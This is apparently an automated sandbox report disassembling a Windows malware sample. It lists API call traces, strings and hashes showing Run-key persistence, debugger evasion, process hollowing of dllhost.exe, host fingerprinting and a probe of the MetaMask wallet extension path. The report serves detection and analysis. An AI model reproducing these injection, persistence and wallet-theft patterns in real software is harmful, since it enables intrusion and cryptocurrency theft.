String ID: $ $$$(memory blob)$@$AES$All available TLS 1.3 ciphers were disabled.$Cipher name too long, not checked.$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$Passed in an unknown TLS 1.3 cipher.$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Unable to set ciphers to from connection ssl config$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
API String ID: 0-3615662502
Opcode ID: 0a0e79c83f06d40216cb747e2cc512a93fcf8d155bc71a029e3911328c75426e
Instruction ID: af3b947062bc393b188d84d19cc717c9d779df723d35b70960414a944b478f62
Opcode Fuzzy Hash: 0a0e79c83f06d40216cb747e2cc512a93fcf8d155bc71a029e3911328c75426e
Instruction Fuzzy Hash: 3482A27190C3429BF711CFA48C44BAF7BE9AF86348F44492DF9859B282E775D508CB92

Function 04EC48A0 Relevance: 51.0, APIs: 19, Strings: 10, Instructions: 208
stringsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB

OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 04EC48D7
ExitProcess.KERNEL32 ref: 04EC48DF
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,?), ref: 04EC48FD
_memset.LIBCMT ref: 04EC4916
_memset.LIBCMT ref: 04EC492E
_sprintf.LIBCMT ref: 04EC4940
lstrlenA.KERNEL32(00000000), ref: 04EC49D8
__time64.LIBCMT ref: 04EC49E9
__localtime64.LIBCMT ref: 04EC49F5
_memset.LIBCMT ref: 04EC4A0F
wsprintfA.USER32 ref: 04EC4A3B
CreateMutexA.KERNEL32(00000000,00000001,xYYAgXEhxx), ref: 04EC4A5C
GetLastError.KERNEL32 ref: 04EC4A62

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 04EC495C, 04EC49BB
CopyC, xrefs: 04EC4AA9
%d-%d-%d %d:%d, xrefs: 04EC4A35
Blocked, xrefs: 04EC48D2
Enable, xrefs: 04EC48B6
xYYAgXEhxx, xrefs: 04EC4A54
"%s", xrefs: 04EC493A
False, xrefs: 04EC48C0
rolyer.update, xrefs: 04EC494C, 04EC49B6
Time, xrefs: 04EC49CD, 04EC4A4A

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$Namewsprintf$ComputerCreateDebugErrorExitFileLastModuleMutexOutputProcessString__localtime64__time64_sprintflstrcpylstrlen
String ID: "%s"$%d-%d-%d %d:%d$Blocked$CopyC$Enable$False$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Time$rolyer.update$xYYAgXEhxx
API String ID: 258807487-782532684
Opcode ID: 24621b81ea66740d9bb188eba87ea48dda7a2adb302a1f31449d785764e77136
Instruction ID: a09a3d175d0cce0fc9ce4a1aef54a85622238f5cd7d83fea2b0d9d42703b781c
Opcode Fuzzy Hash: 24621b81ea66740d9bb188eba87ea48dda7a2adb302a1f31449d785764e77136
Instruction Fuzzy Hash: 94612DF1900214AFE710AB60ED56EEB777CDF04309F0451ACFA95A7181EA74BE46CBA1

Function 04EC4D60 Relevance: 40.4, APIs: 15, Strings: 8, Instructions: 197
libraryloaderregistryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04EC4DC6
_memset.LIBCMT ref: 04EC4DD9
_memset.LIBCMT ref: 04EC4DEC
LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC4DF9
GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04EC4E13
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04EC4E21
GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 04EC4E2F
GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 04EC4E37
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04EC4E3F
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC4E6C
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1CA2304D,?,Enable,?), ref: 04EC5003

Strings

RegQueryValueExA, xrefs: 04EC4E07
Enable, xrefs: 04EC4D8A
ADVAPI32.dll, xrefs: 04EC4DF4
%08X, xrefs: 04EC4FD3
RegEnumKeyExA, xrefs: 04EC4E31
RegEnumValueA, xrefs: 04EC4E29
RegCloseKey, xrefs: 04EC4E39
RegOpenKeyExA, xrefs: 04EC4E1B

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressProc$_memset$Library$FreeLoadOpen
String ID: %08X$ADVAPI32.dll$Enable$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
API String ID: 1822379937-990719231
Opcode ID: ea602fa1121271c81dd0efe2fab1a48628f4dd345e600a5f806df643588ced8c
Instruction ID: e386bd171cd348f68c5185d6e882ce83420ec4e7ff4c48226a41acb6f29e9d82
Opcode Fuzzy Hash: ea602fa1121271c81dd0efe2fab1a48628f4dd345e600a5f806df643588ced8c
Instruction Fuzzy Hash: 7F714AB1A00228AFDB24DF54DD89FEEB7B8FB48700F005199F549A6280DB74BA85CF50

Function 6D01BDE0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 194
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 6D01BE0A
htonl.WS2_32(7F000001), ref: 6D01BE2F
setsockopt.WS2_32(00000000,0000FFFF,000000FB,00000006,00000004), ref: 6D01BE64
bind.WS2_32(00000000,?,00000010), ref: 6D01BE7B
getsockname.WS2_32(00000000,?,00000002), ref: 6D01BE95
listen.WS2_32(00000000,00000001), ref: 6D01BEB2
socket.WS2_32(00000002,00000001,00000000), ref: 6D01BEC7
connect.WS2_32(00000000,?,00000010), ref: 6D01BEDC

Part of subcall function 6D03EFA0: ioctlsocket.WS2_32(00000024,8004667E,00000000), ref: 6D03EFBB

Part of subcall function 6D018710: WSASetLastError.WS2_32(00002726,00000000), ref: 6D01877B

accept.WS2_32(00000000,00000000,00000000), ref: 6D01BF25

Part of subcall function 6CFFEEC0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
Part of subcall function 6CFFEEC0: __alldvrm.LIBCMT ref: 6CFFEEED
Part of subcall function 6CFFEEC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14

send.WS2_32(?,?,00000010,00000000), ref: 6D01BF5F
recv.WS2_32(FFFFFFFF,?,00000010,00000000), ref: 6D01BF91
WSAGetLastError.WS2_32(?,?,?,?,?,00000001,000003E8,00000000), ref: 6D01BF9C
closesocket.WS2_32(00000000), ref: 6D01BFF2
closesocket.WS2_32(?), ref: 6D01BFF6
closesocket.WS2_32(FFFFFFFF), ref: 6D01BFFB
closesocket.WS2_32(00000000), ref: 6D01C042

Strings

3', xrefs: 6D01BFDD

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: closesocket$ErrorLastsocket$CounterPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@acceptbindconnectgetsocknamehtonlioctlsocketlistenrecvsendsetsockopt
String ID: 3'
API String ID: 3942543284-280543908
Opcode ID: dc9211558428b4ff80b248d46c38388a0cec78272fa877e62c369f72904d0f6c
Instruction ID: 350626b9ae36bbc9c855f13b4d186e6fc66331466612452471ffe631e7ae7633
Opcode Fuzzy Hash: dc9211558428b4ff80b248d46c38388a0cec78272fa877e62c369f72904d0f6c
Instruction Fuzzy Hash: 0B61347150C305AFE3009B75CC84B6AB7B8FF46328F500B29F665E62E1EBB1E5458B52

Function 04EB2000 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 73
threadprocessmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04EB201E
CreateProcessA.KERNEL32(00000000,dllhost.exe,00000000,00000000,00000000,00000044,00000000,00000000,?,?), ref: 04EB2051
Wow64GetThreadContext.KERNEL32(?,?), ref: 04EB2078
VirtualAllocEx.KERNEL32(?,00000000,00027400,00001000,00000040), ref: 04EB2093
WriteProcessMemory.KERNEL32(?,00000000,MZER,00027400,00000000), ref: 04EB20AF
Wow64SetThreadContext.KERNEL32(?,00010003), ref: 04EB20C9
ResumeThread.KERNEL32(?), ref: 04EB20D6
CloseHandle.KERNEL32(?), ref: 04EB20E9
CloseHandle.KERNEL32(?), ref: 04EB20F2

Strings

MZER, xrefs: 04EB20A8
D, xrefs: 04EB2047
dllhost.exe, xrefs: 04EB2040

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Thread$CloseContextHandleProcessWow64$AllocCreateMemoryResumeVirtualWrite_memset
String ID: D$MZER$dllhost.exe
API String ID: 93853660-2395381201
Opcode ID: 1427267287002e824d37326d74c782ad9bee5f47cd1793ad0ed7e546def17da8
Instruction ID: a13f0250396e23eec1d3be9b2fc24a27df5030ffd186ac8745a5cbdd2df9c6b0
Opcode Fuzzy Hash: 1427267287002e824d37326d74c782ad9bee5f47cd1793ad0ed7e546def17da8
Instruction Fuzzy Hash: D92131B1A40218ABDB24DB61DC8EF9A7778EB48701F1041D9B709B72C4D6B47E45CF98

Function 04EC79E0 Relevance: 18.1, APIs: 12, Instructions: 110networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000), ref: 04EC7A48
_memset.LIBCMT ref: 04EC7A65
recv.WS2_32(?,?,00002000,00000000), ref: 04EC7A82
setsockopt.WS2_32 ref: 04EC7AD2
CancelIo.KERNEL32(?), ref: 04EC7ADF
InterlockedExchange.KERNEL32(00000000,00000000), ref: 04EC7AEE
closesocket.WS2_32(?), ref: 04EC7AFB
setsockopt.WS2_32 ref: 04EC7B2E
CancelIo.KERNEL32(?), ref: 04EC7B3B
InterlockedExchange.KERNEL32(?,00000000), ref: 04EC7B4A
closesocket.WS2_32(?), ref: 04EC7B57

Part of subcall function 04EC7770: wsprintfA.USER32 ref: 04EC7874

SetEvent.KERNEL32(?), ref: 04EC7B64

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CancelExchangeInterlockedclosesocketsetsockopt$Event_memsetrecvselectwsprintf
String ID:
API String ID: 1886666018-0
Opcode ID: 75d3c3220fee3ea60d92378c58fec36ae1314ac9c8bb0f643ec6ec66cf02d5b3
Instruction ID: 48b008f6c80e2d41e11f2768cfa0b3d52cb3cd96ef399b5b407412e1b1051173
Opcode Fuzzy Hash: 75d3c3220fee3ea60d92378c58fec36ae1314ac9c8bb0f643ec6ec66cf02d5b3
Instruction Fuzzy Hash: D24180B1640305ABEB20DF64DC89FD53769FB08711F0046B8BA099E2C6DB74A949CF61

Function 6CFFBFE0 Relevance: 14.0, APIs: 9, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 716fcec92bc4381fa8a963028cc7853cb03959389aad2f924ff1f22d1a19863b
Instruction ID: 0b2b2369609302dfa5fb560c9864af815695a062b4311427cf4d402fd57776cc
Opcode Fuzzy Hash: 716fcec92bc4381fa8a963028cc7853cb03959389aad2f924ff1f22d1a19863b
Instruction Fuzzy Hash: A012AC716093519FD720DF28C880B6BB7F4EF88308F544A2DF9A9D76A0E771D8068B52

Function 6D018710 Relevance: 12.3, APIs: 8, Instructions: 262networksleepCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00002726,00000000), ref: 6D01877B
WSASetLastError.WS2_32(00002726,?,?,00000000,00000000), ref: 6D0188F4
select.WS2_32(?,?,?,?,00000000), ref: 6D01896C
WSAGetLastError.WS2_32(00000000,00000000), ref: 6D01897D
__WSAFDIsSet.WS2_32(?,?), ref: 6D0189B9
__WSAFDIsSet.WS2_32(?,?), ref: 6D0189EF
__WSAFDIsSet.WS2_32(?,?), ref: 6D018A0D
Sleep.KERNEL32(FFFFFFFE), ref: 6D018A66

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLast$Sleepselect
String ID:
API String ID: 2806104629-0
Opcode ID: 3a63273308a24cc62f5145429b1017a5bbc525da3f233a1e4cff5ba6e322b803
Instruction ID: f6eb6bd6ab020b8ef04d31f62c4e8bd9e2134f1eef89ebb4483c3b19e1858bfd
Opcode Fuzzy Hash: 3a63273308a24cc62f5145429b1017a5bbc525da3f233a1e4cff5ba6e322b803
Instruction Fuzzy Hash: 3791B13190C342ABF7259FA8DC847AEB6E9FF88714F514A2DE9A9C3190E730C645C752

Function 04EC34F0 Relevance: 10.6, APIs: 7, Instructions: 70processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,04EF6A00,00000000,?,?,04EC3FFE), ref: 04EC3501

Part of subcall function 04EB29FE: _malloc.LIBCMT ref: 04EB2A18

Process32First.KERNEL32(00000000,00000000), ref: 04EC352A
lstrcmpiA.KERNEL32(00000024,?), ref: 04EC353D
CloseHandle.KERNEL32(00000000), ref: 04EC3585

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32_malloclstrcmpi
String ID:
API String ID: 2970433402-0
Opcode ID: ffd0ebf0911f0331c59790a04b890298952c3e666e9b6340d51a017e02151b41
Instruction ID: cce5c8d85f4b4d4705ce9fdf27d2ec6bbb5357ed52fa069de1252e76bffb7de6
Opcode Fuzzy Hash: ffd0ebf0911f0331c59790a04b890298952c3e666e9b6340d51a017e02151b41
Instruction Fuzzy Hash: 9A11BC71A01204A7DB209F56ED49BEB7BBCEF41755F00906DFD4A86200E674ED02D7A2

Function 6CFF20D0 Relevance: 54.7, APIs: 22, Strings: 9, Instructions: 458
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32(93BD9D6B), ref: 6CFF20FD
ExitProcess.KERNEL32 ref: 6CFF2109
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 6CFF211D
RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000002,?), ref: 6CFF2158
RegSetValueExA.KERNEL32(?,proxifer.update,00000000,00000001,?,?), ref: 6CFF2193
RegCloseKey.KERNEL32(?), ref: 6CFF219F
GetEnvironmentVariableA.KERNEL32(ALLUSERSPROFILE,?,00000104), ref: 6CFF21B6

Strings

VirtualProtect, xrefs: 6CFF23D1
ALLUSERSPROFILE, xrefs: 6CFF21B1
proxifer.update, xrefs: 6CFF2188
VirtualAlloc, xrefs: 6CFF23E4
CreateFileA, xrefs: 6CFF22F6
"%s", xrefs: 6CFF212A
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 6CFF214E
\krngSwkI6jAYZzGZe.dat, xrefs: 6CFF2218
kernel32.dll, xrefs: 6CFF22FB, 6CFF23D6, 6CFF23E9

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CloseDebuggerEnvironmentExitFileModuleNameOpenPresentProcessValueVariable
String ID: "%s"$ALLUSERSPROFILE$CreateFileA$Software\Microsoft\Windows\CurrentVersion\Run$VirtualAlloc$VirtualProtect$\krngSwkI6jAYZzGZe.dat$kernel32.dll$proxifer.update
API String ID: 796964146-3908791198
Opcode ID: d7f299f902cf1c8fd4bd1defea95e3c16cb4551e9b633e7ab2f3952ecf7f8f2c
Instruction ID: d53f0527c3193203ea50358900ad8fb94e9e06e0009c702d059ceaddc718bd87
Opcode Fuzzy Hash: d7f299f902cf1c8fd4bd1defea95e3c16cb4551e9b633e7ab2f3952ecf7f8f2c
Instruction Fuzzy Hash: 5A0224B19006589BEB20CF24CC58BEDB7B4FF45305F1482D8E259AB192EB716AC5CF58

Function 04EC41E0 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 235
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 04EC4224
_strncpy.LIBCMT ref: 04EC4241
inet_addr.WS2_32(?), ref: 04EC424D

Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB

gethostname.WS2_32(?,00000032), ref: 04EC427C
_strncpy.LIBCMT ref: 04EC428C
LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,?,?,762323A0,?), ref: 04EC42A4
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 04EC42C2
GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04EC42CC
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,762323A0), ref: 04EC42E5
_strncpy.LIBCMT ref: 04EC4356
_strncpy.LIBCMT ref: 04EC436D
GetTickCount.KERNEL32 ref: 04EC4375
wsprintfA.USER32 ref: 04EC43C8
_strncpy.LIBCMT ref: 04EC43E1
_strncpy.LIBCMT ref: 04EC4428
_memset.LIBCMT ref: 04EC4445
wsprintfA.USER32 ref: 04EC445F
_strncpy.LIBCMT ref: 04EC4490

Part of subcall function 04EB1AA0: std::_Xinvalid_argument.LIBCPMT ref: 04EB1AB6

GetFileAttributesA.KERNEL32(00000000), ref: 04EC44A1
lstrcpyA.KERNEL32(?,04ECBDE0), ref: 04EC44BC

Strings

{CA170F4C-9C78-46c4-9018-2BAD1F52C16F}, xrefs: 04EC4234
C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\, xrefs: 04EC4459
kernel32.dll, xrefs: 04EC429F
GetCurrentProcess, xrefs: 04EC42C4
Remark, xrefs: 04EC4253
IsWow64Process, xrefs: 04EC42B2
Time, xrefs: 04EC43CF

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _strncpy$_memset$wsprintf$AddressLibraryProclstrcpy$AttributesComputerCountFileFreeLoadNameTickXinvalid_argumentgethostnameinet_addrstd::_
String ID: C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\$GetCurrentProcess$IsWow64Process$Remark$Time$kernel32.dll${CA170F4C-9C78-46c4-9018-2BAD1F52C16F}
API String ID: 2267238800-1100130286
Opcode ID: daad7806af1b7d9fae8c6bd9f6086a10dd3be2c4610fffecbf0201513812dbce
Instruction ID: 78d86b8a3bccb7bde8201fa6da3f9d7e8575d01c55ef435771a907250fbece9f
Opcode Fuzzy Hash: daad7806af1b7d9fae8c6bd9f6086a10dd3be2c4610fffecbf0201513812dbce
Instruction Fuzzy Hash: D08129B2D002149BDB28EB64DD46BEE7778EB44308F0456ACE909A7281DB707F46CBD5

Function 04EC4520 Relevance: 36.2, APIs: 24, Instructions: 212
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04EC7460: WSAStartup.WS2_32(00000202,?), ref: 04EC74B1
Part of subcall function 04EC7460: InitializeCriticalSection.KERNEL32(?), ref: 04EC74BE
Part of subcall function 04EC7460: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC74C9
Part of subcall function 04EC7460: __time64.LIBCMT ref: 04EC74EC

GetTickCount.KERNEL32 ref: 04EC4586

Part of subcall function 04EC7B90: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 04EC7BB3
Part of subcall function 04EC7B90: socket.WS2_32 ref: 04EC7BC6

Sleep.KERNEL32(0000EA60,00000000), ref: 04EC45C5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 04EC45FE
_memset.LIBCMT ref: 04EC4629
_strncpy.LIBCMT ref: 04EC463F
GetTickCount.KERNEL32 ref: 04EC4664
GetTickCount.KERNEL32 ref: 04EC4675
setsockopt.WS2_32 ref: 04EC46B1
CancelIo.KERNEL32(?), ref: 04EC46BF
InterlockedExchange.KERNEL32(?,00000000), ref: 04EC46CF
closesocket.WS2_32(?), ref: 04EC46DD
SetEvent.KERNEL32(?), ref: 04EC46EB
Sleep.KERNEL32 ref: 04EC4707
Sleep.KERNEL32(00000BB8), ref: 04EC4721
CloseHandle.KERNEL32(?), ref: 04EC473A
GetTickCount.KERNEL32 ref: 04EC485C

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CountEventTick$Sleep$Create$CancelCloseCriticalExchangeHandleInitializeInterlockedResetSectionStartup__time64_memset_strncpyclosesocketsetsockoptsocket
String ID:
API String ID: 2471061221-0
Opcode ID: aee59a563fdb447781676877b038f5b93d844ddec5215762f7787abdc1fad594
Instruction ID: cd6ee99d21b3d75805c59338ffedcf057e15932d079bbf868a01782c93044e34
Opcode Fuzzy Hash: aee59a563fdb447781676877b038f5b93d844ddec5215762f7787abdc1fad594
Instruction Fuzzy Hash: 39819CB25083819FD325DF25D985BDFB7E4FF88708F00492DE69997280DB74A906CB92

Function 04EC4B70 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 146
libraryloaderregistryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,1CA2304D,Time,?,00000000,00000000,04EB5D40,04ECCB10), ref: 04EC4BAC
GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 04EC4BC3
GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 04EC4BCE
GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 04EC4BD9
GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 04EC4BE4
GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 04EC4BEF
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 04EC4BF9
RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 04EC4C37
RegOpenKeyExA.KERNEL32(?,?,00000000,0002001F,?), ref: 04EC4C55
lstrlenA.KERNEL32(80000001), ref: 04EC4C5F
RegSetValueExA.KERNEL32(?,?,00000000,00000001,80000001,00000001), ref: 04EC4C74
FreeLibrary.KERNEL32(00000000), ref: 04EC4CDF

Strings

RegDeleteKeyA, xrefs: 04EC4BD3
RegCreateKeyExA, xrefs: 04EC4BB7
RegDeleteValueA, xrefs: 04EC4BDE
